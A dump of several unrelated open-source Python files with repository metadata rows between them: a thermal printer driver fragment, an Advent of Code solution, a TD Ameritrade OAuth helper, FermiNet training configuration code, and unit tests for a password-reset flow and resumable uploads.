# ability. Doesn't match the datasheet...
# Returns True for paper, False for no paper.
def hasPaper(self):
self.writeBytes(27, 118, 0)
# Bit 2 of response seems to be paper status
stat = ord(self.read(1)) & 0b00000100
# If set, we have paper; if clear, no paper
return stat == 0
def setLineHeight(self, val=32):
if val < 24:
val = 24
self.lineSpacing = val - 24
# The printer doesn't take into account the current text
# height when setting line height, making this more akin
# to inter-line spacing. Default line spacing is 32
# (char height of 24, line spacing of 8).
self.writeBytes(27, 51, val)
# Copied from Arduino lib for parity; is marked 'not working' there
def tab(self):
self.writeBytes(9)
# Copied from Arduino lib for parity; is marked 'not working' there
def setCharSpacing(self, spacing):
self.writeBytes(27, 32, 0, 10)
# Overloading print() in Python pre-3.0 is dirty pool,
# but these are here to provide more direct compatibility
# with existing code written for the Arduino library.
def print(self, *args, **kwargs):
for arg in args:
self.write(str(arg))
# For Arduino code compatibility again
def println(self, *args, **kwargs):
for arg in args:
self.write(str(arg))
self.write('\n')
| 28.837979 | 74 | 0.674561 |
e8d84fcbe39acbf49977343dcb5defcc2b626c85 | 1,109 | py | Python | Day2.py | carolinamassae/advent-of-code-2021 | e8911bda88431160b53ba82ca6baa05ee869fe26 | [
"MIT"
] | null | null | null | Day2.py | carolinamassae/advent-of-code-2021 | e8911bda88431160b53ba82ca6baa05ee869fe26 | [
"MIT"
] | null | null | null | Day2.py | carolinamassae/advent-of-code-2021 | e8911bda88431160b53ba82ca6baa05ee869fe26 | [
"MIT"
] | null | null | null | from itertools import islice, tee
def main():
with open('Input/day2.txt') as f:
lines = [l.strip('\n') for l in f.readlines()]
print('Part One')
diving_submarine(lines)
print('Part Two')
diving_submarine_2(lines)
def diving_submarine(lines):
x = depth = 0
for line in lines:
command, num = line.split(" ")
num = int(num)
if command == 'forward':
x += num
elif command == 'down':
depth += num
elif command == 'up':
depth -= num
else:
print('bugei')
print(x, ' ', depth, ' Result:', x*depth)
def diving_submarine_2(lines):
x = aim = depth = 0
for line in lines:
command, num = line.split(" ")
num = int(num)
print(command, ' ', num)
if command == 'forward':
x += num
if x != 0:
depth += num*aim
elif command == 'down':
aim += num
elif command == 'up':
aim -= num
print(x, ' ', depth, ' Result:', x*depth)
if __name__ == "__main__":
main()
| 23.104167 | 54 | 0.487827 |
f94c983fde9a212a264eff0d48528315c667b3f1 | 4,059 | py | Python | tdameritrade/auth/__init__.py | t-triobox/tdameritrade | 9a6a4162ca336cc7e28bc6ac2d2d718fb3e9f069 | [
"Apache-2.0"
] | 528 | 2018-08-19T17:06:29.000Z | 2022-03-28T03:39:22.000Z | tdameritrade/auth/__init__.py | t-triobox/tdameritrade | 9a6a4162ca336cc7e28bc6ac2d2d718fb3e9f069 | [
"Apache-2.0"
] | 122 | 2018-10-23T00:06:22.000Z | 2022-03-27T15:17:24.000Z | tdameritrade/auth/__init__.py | t-triobox/tdameritrade | 9a6a4162ca336cc7e28bc6ac2d2d718fb3e9f069 | [
"Apache-2.0"
] | 232 | 2018-09-07T19:13:00.000Z | 2022-01-28T17:32:17.000Z | import os
import os.path
import sys
import time
import urllib.parse as up
from shutil import which
import requests
def authentication(client_id, redirect_uri, tdauser=None, tdapass=None):
from selenium import webdriver
client_id = client_id + "@AMER.OAUTHAP"
url = (
"https://auth.tdameritrade.com/auth?response_type=code&redirect_uri="
+ up.quote(redirect_uri)
+ "&client_id="
+ up.quote(client_id)
)
options = webdriver.ChromeOptions()
if sys.platform == "darwin":
# MacOS
if os.path.exists(
"/Applications/Google Chrome.app/Contents/MacOS/Google Chrome"
):
options.binary_location = (
"/Applications/Google Chrome.app/Contents/MacOS/Google Chrome"
)
elif os.path.exists("/Applications/Chrome.app/Contents/MacOS/Google Chrome"):
options.binary_location = (
"/Applications/Chrome.app/Contents/MacOS/Google Chrome"
)
elif "linux" in sys.platform:
# Linux
options.binary_location = (
which("google-chrome") or which("chrome") or which("chromium")
)
else:
# Windows
if os.path.exists(
"C:/Program Files (x86)/Google/Chrome/Application/chrome.exe"
):
options.binary_location = (
"C:/Program Files (x86)/Google/Chrome/Application/chrome.exe"
)
elif os.path.exists("C:/Program Files/Google/Chrome/Application/chrome.exe"):
options.binary_location = (
"C:/Program Files/Google/Chrome/Application/chrome.exe"
)
chrome_driver_binary = which("chromedriver") or "/usr/local/bin/chromedriver"
driver = webdriver.Chrome(chrome_driver_binary, chrome_options=options)
driver.get(url)
# Set tdauser and tdapass from environemnt if TDAUSER and TDAPASS environment variables were defined
tdauser = tdauser or os.environ.get("TDAUSER", "")
tdapass = tdapass or os.environ.get("TDAPASS", "")
# Fully automated oauth2 authentication (if tdauser and tdapass were inputed into the function, or found as
# environment variables)
if tdauser and tdapass:
ubox = driver.find_element_by_id("username")
pbox = driver.find_element_by_id("password")
ubox.send_keys(tdauser)
pbox.send_keys(tdapass)
driver.find_element_by_id("accept").click()
driver.find_element_by_id("accept").click()
while True:
try:
code = up.unquote(driver.current_url.split("code=")[1])
if code != "":
break
else:
time.sleep(2)
except (TypeError, IndexError):
pass
else:
input("after giving access, hit enter to continue")
code = up.unquote(driver.current_url.split("code=")[1])
driver.close()
resp = requests.post(
"https://api.tdameritrade.com/v1/oauth2/token",
headers={"Content-Type": "application/x-www-form-urlencoded"},
data={
"grant_type": "authorization_code",
"refresh_token": "",
"access_type": "offline",
"code": code,
"client_id": client_id,
"redirect_uri": redirect_uri,
},
)
if resp.status_code != 200:
raise Exception("Could not authenticate!")
return resp.json()
def access_token(refresh_token, client_id):
resp = requests.post(
"https://api.tdameritrade.com/v1/oauth2/token",
headers={"Content-Type": "application/x-www-form-urlencoded"},
data={
"grant_type": "refresh_token",
"refresh_token": refresh_token,
"client_id": client_id,
},
)
if resp.status_code != 200:
raise Exception("Could not authenticate!")
return resp.json()
def main():
client_id = input("client id:")
redirect_uri = input("redirect uri:")
print(authentication(client_id, redirect_uri))
| 32.472 | 111 | 0.605075 |
75772d21417baa16fc4160c5477d2c2d553a4730 | 21,276 | py | Python | ferminet/train.py | rickyHong/ferminet | 39c638f60349fa25da073780e3fa9052433e215e | [
"Apache-2.0"
] | 1 | 2020-10-20T06:53:51.000Z | 2020-10-20T06:53:51.000Z | ferminet/train.py | 13571815901/ferminet | 27f90beb57de62333989a5a64f47d1759b33804e | [
"Apache-2.0"
] | null | null | null | ferminet/train.py | 13571815901/ferminet | 27f90beb57de62333989a5a64f47d1759b33804e | [
"Apache-2.0"
] | 1 | 2021-04-25T10:05:15.000Z | 2021-04-25T10:05:15.000Z | # Lint as: python3
# Copyright 2018 DeepMind Technologies Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Learn ground state wavefunctions for molecular systems using VMC."""
import copy
import os
from typing import Any, Mapping, Optional, Sequence, Tuple
from absl import logging
import attr
from ferminet import hamiltonian
from ferminet import mcmc
from ferminet import mean_corrected_kfac_opt
from ferminet import networks
from ferminet import qmc
from ferminet.utils import elements
from ferminet.utils import scf
from ferminet.utils import system
import numpy as np
import tensorflow.compat.v1 as tf
def _validate_directory(obj, attribute, value):
"""Validates value is a directory."""
del obj
if value and not os.path.isdir(value):
raise ValueError(f'{attribute.name} is not a directory')
@attr.s(auto_attribs=True)
class LoggingConfig:
"""Logging information for Fermi Nets.
Attributes:
result_path: directory to use for saving model parameters and calculations
results. Created if does not exist.
save_frequency: frequency (in minutes) at which parameters are saved.
restore_path: directory to use for restoring model parameters.
stats_frequency: frequency (in iterations) at which statistics (via stats
hooks) are updated and stored.
replicas: the number of replicas used during training. Will be set
automatically.
walkers: If true, log walkers at every step.
wavefunction: If true, log wavefunction at every step.
local_energy: If true, log local energy at every step.
config: dictionary of additional information about the calculation setup.
Reported along with calculation statistics.
"""
result_path: str = '.'
save_frequency: float = 10
restore_path: str = attr.ib(default=None, validator=_validate_directory)
stats_frequency: int = 1
replicas: int = 1
walkers: bool = False
wavefunction: bool = False
local_energy: bool = False
config: Mapping[str, Any] = attr.ib(converter=dict,
default=attr.Factory(dict))
@attr.s(auto_attribs=True)
class MCMCConfig:
"""Markov Chain Monte Carlo configuration for Fermi Nets.
Attributes:
burn_in: Number of burn in steps after pretraining.
steps: 'Number of MCMC steps to make between network updates.
init_width: Width of (atom-centred) Gaussians used to generate initial
electron configurations.
move_width: Width of Gaussian used for random moves.
init_means: Iterable of 3*nelectrons giving the mean initial position of
each electron. Configurations are drawn using Gaussians of width
init_width at each 3D position. Alpha electrons are listed before beta
electrons. If empty, electrons are assigned to atoms based upon the
isolated atom spin configuration. Expert use only.
"""
burn_in: int = 100
steps: int = 10
init_width: float = 0.8
move_width: float = 0.02
init_means: Optional[Sequence[float]] = None
@attr.s(auto_attribs=True)
class PretrainConfig:
"""Hartree-Fock pretraining algorithm configuration for Fermi Nets.
Attributes:
iterations: Number of iterations for which to pretrain the network to match
Hartree-Fock orbitals.
basis: Basis set used to run Hartree-Fock calculation in PySCF.
"""
iterations: int = 1000
basis: str = 'sto-3g'
@attr.s(auto_attribs=True)
class OptimConfig:
"""Optimization configuration for Fermi Nets.
Attributes:
iterations: Number of iterations')
clip_el: If not none, scale at which to clip local energy.
learning_rate: learning rate.
learning_rate_decay: exponent of learning rate decay.
learning_rate_delay: scale of the rate decay.
use_kfac: Use the K-FAC optimizer if true, ADAM optimizer otherwise.
check_loss: Apply gradient update only if the loss is not NaN. If true,
training could be slightly slower but the checkpoint written out when a
NaN is detected will be with the network weights which led to the NaN.
deterministic: CPU only mode that also enforces determinism. Will run
*significantly* slower if used.
"""
iterations: int = 1000000
learning_rate: float = 1.e-4
learning_rate_decay: float = 1.0
learning_rate_delay: float = 10000.0
clip_el: float = 5.0
use_kfac: bool = True
check_loss: bool = False
deterministic: bool = False
@attr.s(auto_attribs=True)
class KfacConfig:
"""K-FAC configuration - see docs at https://github.com/tensorflow/kfac/."""
invert_every: int = 1
cov_update_every: int = 1
damping: float = 0.001
cov_ema_decay: float = 0.95
momentum: float = 0.0
momentum_type: str = attr.ib(
default='regular',
validator=attr.validators.in_(
['regular', 'adam', 'qmodel', 'qmodel_fixedmu']))
adapt_damping: bool = False
damping_adaptation_decay: float = 0.9
damping_adaptation_interval: int = 5
min_damping: float = 1.e-5
norm_constraint: float = 0.001
@attr.s(auto_attribs=True)
class NetworkConfig:
"""Network configuration for Fermi Net.
Attributes:
architecture: The choice of architecture to run the calculation with. Either
"ferminet" or "slater" for the Fermi Net and standard Slater determinant
respectively.
hidden_units: Number of hidden units in each layer of the network. If
the Fermi Net with one- and two-electron streams is used, a tuple is
provided for each layer, with the first element giving the number of
hidden units in the one-electron stream and the second element giving the
number of units in the two-electron stream. Otherwise, each layer is
represented by a single integer.
determinants: Number of determinants to use.
r12_en_features: Include r12/distance features between electrons and nuclei.
Highly recommended.
r12_ee_features: Include r12/distance features between pairs of electrons.
Highly recommended.
pos_ee_features: Include electron-electron position features. Highly
recommended.
use_envelope: Include multiplicative exponentially-decaying envelopes on
each orbital. Calculations will not converge if set to False.
backflow: Include backflow transformation in input coordinates. '
Only for use if network_architecture == "slater". Implies build_backflow
is also True.
build_backflow: Create backflow weights but do not include backflow
coordinate transformation in the netwrok. Use to train a Slater-Jastrow
architecture and then train a Slater-Jastrow-Backflow architecture
based on it in a two-stage optimization process.
residual: Use residual connections in network. Recommended.
after_det: Number of hidden units in each layer of the neural network after
the determinants. By default, just takes a weighted sum of
determinants with no nonlinearity.
jastrow_en: Include electron-nuclear Jastrow factor. Only relevant with
Slater-Jastrow-Backflow architectures.
jastrow_ee: Include electron-electron Jastrow factor. Only relevant with
Slater-Jastrow-Backflow architectures.
jastrow_een: Include electron-electron-nuclear Jastrow factor. Only
relevant with Slater-Jastrow-Backflow architectures.
"""
architecture: str = attr.ib(
default='ferminet', validator=attr.validators.in_(['ferminet', 'slater']))
hidden_units: Sequence[Tuple[int, int]] = ((256, 32),) * 4
determinants: int = 16
r12_en_features: bool = True
r12_ee_features: bool = True
pos_ee_features: bool = True
use_envelope: bool = True
backflow: bool = False
build_backflow: bool = False
residual: bool = True
after_det: Sequence[int] = (1,)
jastrow_en: bool = False
jastrow_ee: bool = False
jastrow_een: bool = False
def assign_electrons(molecule, electrons):
"""Assigns electrons to atoms using non-interacting spin configurations.
Args:
molecule: List of Hamiltonian.Atom objects for each atom in the system.
electrons: Pair of ints giving number of alpha (spin-up) and beta
(spin-down) electrons.
Returns:
1D np.ndarray of length 3N containing initial mean positions of each
electron based upon the atom positions, where N is the total number of
electrons. The first 3*electrons[0] positions correspond to the alpha
(spin-up) electrons and the next 3*electrons[1] to the beta (spin-down)
electrons.
Raises:
RuntimeError: if a different number of electrons or different spin
polarisation is generated.
"""
# Assign electrons based upon unperturbed atoms and ignore impact of
# fractional nuclear charge.
nuclei = [int(round(atom.charge)) for atom in molecule]
total_charge = sum(nuclei) - sum(electrons)
# Construct a dummy iso-electronic neutral system.
neutral_molecule = [copy.copy(atom) for atom in molecule]
if total_charge != 0:
logging.warning(
'Charged system. Using heuristics to set initial electron positions')
charge = 1 if total_charge > 0 else -1
while total_charge != 0:
# Poor proxy for electronegativity.
atom_index = nuclei.index(max(nuclei) if total_charge < 0 else min(nuclei))
atom = neutral_molecule[atom_index]
atom.charge -= charge
atom.atomic_number = int(round(atom.charge))
if int(round(atom.charge)) == 0:
neutral_molecule.pop(atom_index)
else:
atom.symbol = elements.ATOMIC_NUMS[atom.atomic_number].symbol
total_charge -= charge
nuclei = [int(round(atom.charge)) for atom in neutral_molecule]
spin_pol = lambda electrons: electrons[0] - electrons[1]
abs_spin_pol = abs(spin_pol(electrons))
if len(neutral_molecule) == 1:
elecs_atom = [electrons]
else:
elecs_atom = []
spin_pol_assigned = 0
for ion in neutral_molecule:
# Greedily assign up and down electrons based upon the ground state spin
# configuration of an isolated atom.
atom_spin_pol = elements.ATOMIC_NUMS[ion.atomic_number].spin_config
nelec = ion.atomic_number
na = (nelec + atom_spin_pol) // 2
nb = nelec - na
# Attempt to keep spin polarisation as close to 0 as possible.
if (spin_pol_assigned > 0 and
spin_pol_assigned + atom_spin_pol > abs_spin_pol):
elec_atom = [nb, na]
else:
elec_atom = [na, nb]
spin_pol_assigned += spin_pol(elec_atom)
elecs_atom.append(elec_atom)
electrons_assigned = [sum(e) for e in zip(*elecs_atom)]
spin_pol_assigned = spin_pol(electrons_assigned)
if np.sign(spin_pol_assigned) == -np.sign(abs_spin_pol):
# Started with the wrong guess for spin-up vs spin-down.
elecs_atom = [e[::-1] for e in elecs_atom]
spin_pol_assigned = -spin_pol_assigned
if spin_pol_assigned != abs_spin_pol:
logging.info('Spin polarisation does not match isolated atoms. '
'Using heuristics to set initial electron positions.')
while spin_pol_assigned != abs_spin_pol:
atom_spin_pols = [abs(spin_pol(e)) for e in elecs_atom]
atom_index = atom_spin_pols.index(max(atom_spin_pols))
elec_atom = elecs_atom[atom_index]
if spin_pol_assigned < abs_spin_pol and elec_atom[0] <= elec_atom[1]:
elec_atom[0] += 1
elec_atom[1] -= 1
spin_pol_assigned += 2
elif spin_pol_assigned < abs_spin_pol and elec_atom[0] > elec_atom[1]:
elec_atom[0] -= 1
elec_atom[1] += 1
spin_pol_assigned += 2
elif spin_pol_assigned > abs_spin_pol and elec_atom[0] > elec_atom[1]:
elec_atom[0] -= 1
elec_atom[1] += 1
spin_pol_assigned -= 2
else:
elec_atom[0] += 1
elec_atom[1] -= 1
spin_pol_assigned -= 2
electrons_assigned = [sum(e) for e in zip(*elecs_atom)]
if spin_pol(electrons_assigned) == -spin_pol(electrons):
elecs_atom = [e[::-1] for e in elecs_atom]
electrons_assigned = electrons_assigned[::-1]
logging.info(
'Electrons assigned %s.', ', '.join([
'{}: {}'.format(atom.symbol, elec_atom)
for atom, elec_atom in zip(molecule, elecs_atom)
]))
if any(e != e_assign for e, e_assign in zip(electrons, electrons_assigned)):
raise RuntimeError(
'Assigned incorrect number of electrons ([%s instead of %s]' %
(electrons_assigned, electrons))
if any(min(ne) < 0 for ne in zip(*elecs_atom)):
raise RuntimeError('Assigned negative number of electrons!')
electron_positions = np.concatenate([
np.tile(atom.coords, e[0])
for atom, e in zip(neutral_molecule, elecs_atom)
] + [
np.tile(atom.coords, e[1])
for atom, e in zip(neutral_molecule, elecs_atom)
])
return electron_positions
def train(molecule: Sequence[system.Atom],
spins: Tuple[int, int],
batch_size: int,
network_config: Optional[NetworkConfig] = None,
pretrain_config: Optional[PretrainConfig] = None,
optim_config: Optional[OptimConfig] = None,
kfac_config: Optional[KfacConfig] = None,
mcmc_config: Optional[MCMCConfig] = None,
logging_config: Optional[LoggingConfig] = None,
multi_gpu: bool = False,
double_precision: bool = False,
graph_path: Optional[str] = None):
"""Configures and runs training loop.
Args:
molecule: molecule description.
spins: pair of ints specifying number of spin-up and spin-down electrons
respectively.
batch_size: batch size. Also referred to as the number of Markov Chain Monte
Carlo configurations/walkers.
network_config: network configuration. Default settings in NetworkConfig are
used if not specified.
pretrain_config: pretraining configuration. Default settings in
PretrainConfig are used if not specified.
optim_config: optimization configuration. Default settings in OptimConfig
are used if not specified.
kfac_config: K-FAC configuration. Default settings in KfacConfig are used if
not specified.
mcmc_config: Markov Chain Monte Carlo configuration. Default settings in
MCMCConfig are used if not specified.
logging_config: logging and checkpoint configuration. Default settings in
LoggingConfig are used if not specified.
multi_gpu: Use all available GPUs. Default: use only a single GPU.
double_precision: use tf.float64 instead of tf.float32 for all operations.
Warning - double precision is not currently functional with K-FAC.
graph_path: directory to save a representation of the TF graph to. Not saved
Raises:
RuntimeError: if mcmc_config.init_means is supplied but is of the incorrect
length.
"""
if not mcmc_config:
mcmc_config = MCMCConfig()
if not logging_config:
logging_config = LoggingConfig()
if not pretrain_config:
pretrain_config = PretrainConfig()
if not optim_config:
optim_config = OptimConfig()
if not kfac_config:
kfac_config = KfacConfig()
if not network_config:
network_config = NetworkConfig()
nelectrons = sum(spins)
precision = tf.float64 if double_precision else tf.float32
if multi_gpu:
strategy = tf.distribute.MirroredStrategy()
else:
# Get the default (single-device) strategy.
strategy = tf.distribute.get_strategy()
if multi_gpu:
batch_size = batch_size // strategy.num_replicas_in_sync
logging.info('Setting per-GPU batch size to %s.', batch_size)
logging_config.replicas = strategy.num_replicas_in_sync
logging.info('Running on %s replicas.', strategy.num_replicas_in_sync)
# Create a re-entrant variable scope for network.
with tf.variable_scope('model') as model:
pass
with strategy.scope():
with tf.variable_scope(model, auxiliary_name_scope=False) as model1:
with tf.name_scope(model1.original_name_scope):
fermi_net = networks.FermiNet(
atoms=molecule,
nelectrons=spins,
slater_dets=network_config.determinants,
hidden_units=network_config.hidden_units,
after_det=network_config.after_det,
architecture=network_config.architecture,
r12_ee_features=network_config.r12_ee_features,
r12_en_features=network_config.r12_en_features,
pos_ee_features=network_config.pos_ee_features,
build_backflow=network_config.build_backflow,
use_backflow=network_config.backflow,
jastrow_en=network_config.jastrow_en,
jastrow_ee=network_config.jastrow_ee,
jastrow_een=network_config.jastrow_een,
logdet=True,
envelope=network_config.use_envelope,
residual=network_config.residual,
pretrain_iterations=pretrain_config.iterations)
scf_approx = scf.Scf(
molecule,
nelectrons=spins,
restricted=False,
basis=pretrain_config.basis)
if pretrain_config.iterations > 0:
scf_approx.run()
hamiltonian_ops = hamiltonian.operators(molecule, nelectrons)
if mcmc_config.init_means:
if len(mcmc_config.init_means) != 3 * nelectrons:
raise RuntimeError('Initial electron positions of incorrect shape. '
'({} not {})'.format(
len(mcmc_config.init_means), 3 * nelectrons))
init_means = [float(x) for x in mcmc_config.init_means]
else:
init_means = assign_electrons(molecule, spins)
# Build the MCMC state inside the same variable scope as the network.
with tf.variable_scope(model, auxiliary_name_scope=False) as model1:
with tf.name_scope(model1.original_name_scope):
data_gen = mcmc.MCMC(
fermi_net,
batch_size,
init_mu=init_means,
init_sigma=mcmc_config.init_width,
move_sigma=mcmc_config.move_width,
dtype=precision)
with tf.variable_scope('HF_data_gen'):
hf_data_gen = mcmc.MCMC(
scf_approx.tf_eval_slog_hartree_product,
batch_size,
init_mu=init_means,
init_sigma=mcmc_config.init_width,
move_sigma=mcmc_config.move_width,
dtype=precision)
with tf.name_scope('learning_rate_schedule'):
global_step = tf.train.get_or_create_global_step()
lr = optim_config.learning_rate * tf.pow(
(1.0 / (1.0 + (tf.cast(global_step, tf.float32) /
optim_config.learning_rate_delay))),
optim_config.learning_rate_decay)
if optim_config.learning_rate < 1.e-10:
logging.warning('Learning rate less than 10^-10. Not using an optimiser.')
optim_fn = lambda _: None
update_cached_data = None
elif optim_config.use_kfac:
cached_data = tf.get_variable(
'MCMC_cache',
initializer=tf.zeros(shape=data_gen.walkers.shape, dtype=precision),
use_resource=True,
trainable=False,
dtype=precision,
)
if kfac_config.adapt_damping:
update_cached_data = tf.assign(cached_data, data_gen.walkers)
else:
update_cached_data = None
optim_fn = lambda layer_collection: mean_corrected_kfac_opt.MeanCorrectedKfacOpt( # pylint: disable=g-long-lambda
invert_every=kfac_config.invert_every,
cov_update_every=kfac_config.cov_update_every,
learning_rate=lr,
norm_constraint=kfac_config.norm_constraint,
damping=kfac_config.damping,
cov_ema_decay=kfac_config.cov_ema_decay,
momentum=kfac_config.momentum,
momentum_type=kfac_config.momentum_type,
loss_fn=lambda x: tf.nn.l2_loss(fermi_net(x)[0]),
train_batch=data_gen.walkers,
prev_train_batch=cached_data,
layer_collection=layer_collection,
batch_size=batch_size,
adapt_damping=kfac_config.adapt_damping,
is_chief=True,
damping_adaptation_decay=kfac_config.damping_adaptation_decay,
damping_adaptation_interval=kfac_config.damping_adaptation_interval,
min_damping=kfac_config.min_damping,
use_passed_loss=False,
estimation_mode='exact',
)
else:
adam = tf.train.AdamOptimizer(lr)
optim_fn = lambda _: adam
update_cached_data = None
qmc_net = qmc.QMC(
hamiltonian_ops,
fermi_net,
data_gen,
hf_data_gen,
clip_el=optim_config.clip_el,
check_loss=optim_config.check_loss,
)
qmc_net.train(
optim_fn,
optim_config.iterations,
logging_config,
using_kfac=optim_config.use_kfac,
strategy=strategy,
scf_approx=scf_approx,
global_step=global_step,
determinism_mode=optim_config.deterministic,
cached_data_op=update_cached_data,
write_graph=os.path.abspath(graph_path) if graph_path else None,
burn_in=mcmc_config.burn_in,
mcmc_steps=mcmc_config.steps,
)
| 39.18232 | 120 | 0.707605 |
0a5089d018fb9bab6a938b1368743d0c5db5d615 | 2,360 | py | Python | tests/admin/forgot_password_test.py | stevej2608/dash-spa | aaf79e1df1af4f3afc2efcdc2b92a7dcaf74f673 | [
"MIT"
] | 27 | 2019-09-24T18:31:14.000Z | 2022-03-01T16:44:21.000Z | tests/admin/forgot_password_test.py | stevej2608/dash-spa | aaf79e1df1af4f3afc2efcdc2b92a7dcaf74f673 | [
"MIT"
] | 1 | 2021-12-31T08:29:08.000Z | 2022-02-18T06:49:51.000Z | tests/admin/forgot_password_test.py | stevej2608/dash-spa | aaf79e1df1af4f3afc2efcdc2b92a7dcaf74f673 | [
"MIT"
] | 4 | 2019-09-26T19:21:39.000Z | 2022-02-12T18:51:20.000Z | from tests.admin import USER_EMAIL
NEW_PASSWORD = 'bigjoe66'
mail_args = {}
def test_admin_forgot(mocker, duo):
# Mock the template emailer
def mock_send(self, sender, receiver, subject, test_mode):
mail_args.update(self.args)
mail_args['sender'] = sender
mail_args['receiver'] = receiver
mail_args['subject'] = subject
mail_args['code'] = self.args['code']
mocker.patch('dash_spa.admin.template_mailer.TemplateMailer.send', mock_send)
# Mock password changer
def mock_change_password(self, email, password):
mail_args['new_password'] = password
return True
mocker.patch('dash_spa.admin.login_manager.AdminLoginManager.change_password', mock_change_password)
# Render the forgot password page, enter the test user email.
duo.server_url = duo.server_url + "/admin/forgot"
result = duo.wait_for_text_to_equal("#admin-forgot-btn", "Reset Request", timeout=20)
assert result
email=duo.find_element("#admin-forgot-email")
email.send_keys(USER_EMAIL)
forgot_btn = duo.find_element("#admin-forgot-btn")
forgot_btn.click()
# A verification code is sent by email, this is intercepted
# by TemplateMailer.mock_send(). The user is automatically redirected to
# the verification code page.
# Enter verification code
result = duo.wait_for_text_to_equal("#admin-forgot1-btn", "Enter Verification Code", timeout=20)
assert result
code_input=duo.find_element("#admin-forgot1-code")
code_input.send_keys(mail_args['code'])
reset_btn=duo.find_element("#admin-forgot1-btn")
reset_btn.click()
# If the verification code checks out the user is redirected to the password
# reset page
result = duo.wait_for_text_to_equal("#admin-forgot2-btn", "Update Password", timeout=20)
assert result
# Enter the new password.
password=duo.find_element("#admin-forgot2-password")
password.send_keys(NEW_PASSWORD)
confirm_password=duo.find_element("#admin-forgot2-confirm_password")
confirm_password.send_keys(NEW_PASSWORD)
reset_btn=duo.find_element("#admin-forgot2-btn")
reset_btn.click()
# If new password is accepted the user is redirected to the login page.
result = duo.wait_for_text_to_equal("#admin-loginfrm-btn", "Sign In", timeout=20)
assert result
| 29.873418 | 104 | 0.715678 |
b8d83157a837cd367665ae212ae0e7561f374985 | 12,549 | py | Python | tests/unit/requests/test_upload.py | plamut/google-resumable-media-python | fcc24fcabd75424bb289c26aeda9bfbccd084d1e | [
"Apache-2.0"
] | null | null | null | tests/unit/requests/test_upload.py | plamut/google-resumable-media-python | fcc24fcabd75424bb289c26aeda9bfbccd084d1e | [
"Apache-2.0"
] | null | null | null | tests/unit/requests/test_upload.py | plamut/google-resumable-media-python | fcc24fcabd75424bb289c26aeda9bfbccd084d1e | [
"Apache-2.0"
] | null | null | null | # Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import http.client
import io
import json
import mock
from google import resumable_media
import google.resumable_media.requests.upload as upload_mod
URL_PREFIX = "https://www.googleapis.com/upload/storage/v1/b/{BUCKET}/o"
SIMPLE_URL = URL_PREFIX + "?uploadType=media&name={OBJECT}"
MULTIPART_URL = URL_PREFIX + "?uploadType=multipart"
RESUMABLE_URL = URL_PREFIX + "?uploadType=resumable"
ONE_MB = 1024 * 1024
BASIC_CONTENT = "text/plain"
JSON_TYPE = "application/json; charset=UTF-8"
JSON_TYPE_LINE = b"content-type: application/json; charset=UTF-8\r\n"
EXPECTED_TIMEOUT = (61, 60)
class TestSimpleUpload(object):
def test_transmit(self):
data = b"I have got a lovely bunch of coconuts."
content_type = BASIC_CONTENT
upload = upload_mod.SimpleUpload(SIMPLE_URL)
transport = mock.Mock(spec=["request"])
transport.request.return_value = _make_response()
assert not upload.finished
ret_val = upload.transmit(transport, data, content_type)
assert ret_val is transport.request.return_value
upload_headers = {"content-type": content_type}
transport.request.assert_called_once_with(
"POST",
SIMPLE_URL,
data=data,
headers=upload_headers,
timeout=EXPECTED_TIMEOUT,
)
assert upload.finished
def test_transmit_w_custom_timeout(self):
data = b"I have got a lovely bunch of coconuts."
content_type = BASIC_CONTENT
upload = upload_mod.SimpleUpload(SIMPLE_URL)
transport = mock.Mock(spec=["request"])
transport.request.return_value = _make_response()
upload.transmit(transport, data, content_type, timeout=12.6)
expected_headers = {"content-type": content_type}
transport.request.assert_called_once_with(
"POST",
SIMPLE_URL,
data=data,
headers=expected_headers,
timeout=12.6,
)
class TestMultipartUpload(object):
@mock.patch("google.resumable_media._upload.get_boundary", return_value=b"==4==")
def test_transmit(self, mock_get_boundary):
data = b"Mock data here and there."
metadata = {"Hey": "You", "Guys": "90909"}
content_type = BASIC_CONTENT
upload = upload_mod.MultipartUpload(MULTIPART_URL)
transport = mock.Mock(spec=["request"])
transport.request.return_value = _make_response()
assert not upload.finished
ret_val = upload.transmit(transport, data, metadata, content_type)
assert ret_val is transport.request.return_value
expected_payload = (
b"--==4==\r\n"
+ JSON_TYPE_LINE
+ b"\r\n"
+ json.dumps(metadata).encode("utf-8")
+ b"\r\n"
+ b"--==4==\r\n"
b"content-type: text/plain\r\n"
b"\r\n"
b"Mock data here and there.\r\n"
b"--==4==--"
)
multipart_type = b'multipart/related; boundary="==4=="'
upload_headers = {"content-type": multipart_type}
transport.request.assert_called_once_with(
"POST",
MULTIPART_URL,
data=expected_payload,
headers=upload_headers,
timeout=EXPECTED_TIMEOUT,
)
assert upload.finished
mock_get_boundary.assert_called_once_with()
@mock.patch("google.resumable_media._upload.get_boundary", return_value=b"==4==")
def test_transmit_w_custom_timeout(self, mock_get_boundary):
data = b"Mock data here and there."
metadata = {"Hey": "You", "Guys": "90909"}
content_type = BASIC_CONTENT
upload = upload_mod.MultipartUpload(MULTIPART_URL)
transport = mock.Mock(spec=["request"])
transport.request.return_value = _make_response()
upload.transmit(transport, data, metadata, content_type, timeout=12.6)
expected_payload = b"".join(
(
b"--==4==\r\n",
JSON_TYPE_LINE,
b"\r\n",
json.dumps(metadata).encode("utf-8"),
b"\r\n",
b"--==4==\r\n",
b"content-type: text/plain\r\n",
b"\r\n",
b"Mock data here and there.\r\n",
b"--==4==--",
)
)
multipart_type = b'multipart/related; boundary="==4=="'
upload_headers = {"content-type": multipart_type}
transport.request.assert_called_once_with(
"POST",
MULTIPART_URL,
data=expected_payload,
headers=upload_headers,
timeout=12.6,
)
assert upload.finished
mock_get_boundary.assert_called_once_with()
class TestResumableUpload(object):
def test_initiate(self):
upload = upload_mod.ResumableUpload(RESUMABLE_URL, ONE_MB)
data = b"Knock knock who is there"
